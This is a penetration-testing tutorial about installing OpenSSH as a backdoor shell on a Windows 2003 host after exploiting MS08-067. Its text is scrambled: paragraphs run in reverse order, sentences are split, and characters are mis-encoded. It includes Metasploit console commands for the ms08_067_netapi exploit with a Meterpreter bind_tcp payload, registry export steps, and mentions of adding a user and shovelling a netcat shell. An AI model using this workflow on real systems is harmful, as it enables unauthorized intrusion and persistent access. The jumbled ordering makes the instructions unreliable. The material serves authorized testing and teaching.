Meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH Transmitting intermediate stager for over-sized stage.(191 bytes) Msf exploit(ms08_067_netapi) > show options Msf exploit(ms08_067_netapi) > set TARGET 5 Msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp Windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption Searching loaded modules for pattern 'ms08_067'. Below is an example of how we exploit this vulnerability using Metasploit (with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.Įxploiting the framework-3.2]# nc -v 192.168.1.40 445Ĭonnection to 192.168.1.40 445 port framework-3.2]#. Our target happens to have the MS08-067 Server Service RPC vulnerability. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.
Now that you have all of this data saved on your USB thumb drive, lets assume that our penetration testing machine is a CentOS Linux operating system with IP address of 192.168.1.37, and that our target is a Windows 2003 SP0 machine with IP address of 192.168.1.40. Performing an installation via command shell Save this OPENSSH.REG file into your local copy of all of the openssh directory structure. Concatenate all of these registry files together into one file.Ħ. REG EXPORT “HKLM\SYSTEM\ControlSet001\Services\OpenSSHd” 3.REGĥ. REG EXPORT “HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd” 2.REG REG EXPORT “HKLM\SOFTWARE\Cygnus Solutions” 1.REG
Export the following registry keys using the REG EXPORT command as follows: Copy recursively with XCOPY and make sure you fully retain the directory structure.Ĥ.
Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media.
I suggest accepting the default program location of C:\Program Files\OpenSSHģ. Run the GUI installer package on your Windows lab/test machine.
Download the setupssh.exe installation package from Ģ. The basic steps to prepare a command line OpenSSH installation for Windows are as follows:ġ. Preparing for a custom command line OpenSSH Installation in your lab Because the setup process in the OpenSSH packages uses the GUI, you have to perform some steps to customize your own command line only installation. It supports SSH command line terminal access, and secure copy / secure file transfer. OpenSSH for windows ( ) is a minimized Cygwin ( ) environment that has been customized to support only SSH. The telnet service offers no encryption either. VNC is a great choice as it provides an easy command line installation with files residing in a single directory, and only a limited number of registry entries, however it offers no encryption. A number of choices exist including activating the telnet service, activating Microsoft terminal services (remote desktop protocol), installing VNC (or installing OpenSSH for Windows. If a penetration tester is permitted to modify the target server, then a more consistent, fully functional terminal level access will greatly help during the testing process. If using NETCAT to shovel a shell, entering CTRL-C to terminate some command can end up terminating your shell! Some commands may not function normally if they depend on the use of control sequences. The command shell may produce strange output due to control characters. The challenge is that command shell access is not equivalent to full terminal access. Or if perhaps the Meterpreter is being used, command shell access can be had by executing a CMD.EXE and interacting directly with it, or perhaps by having NETCAT shovel a command shell back to the penetration tester. If, for example, Metasploit is being used, command shell access can be delivered as the payload of a buffer overflow exploit. During a network penetration test, Windows command shell access is often obtained through some sort of exploit.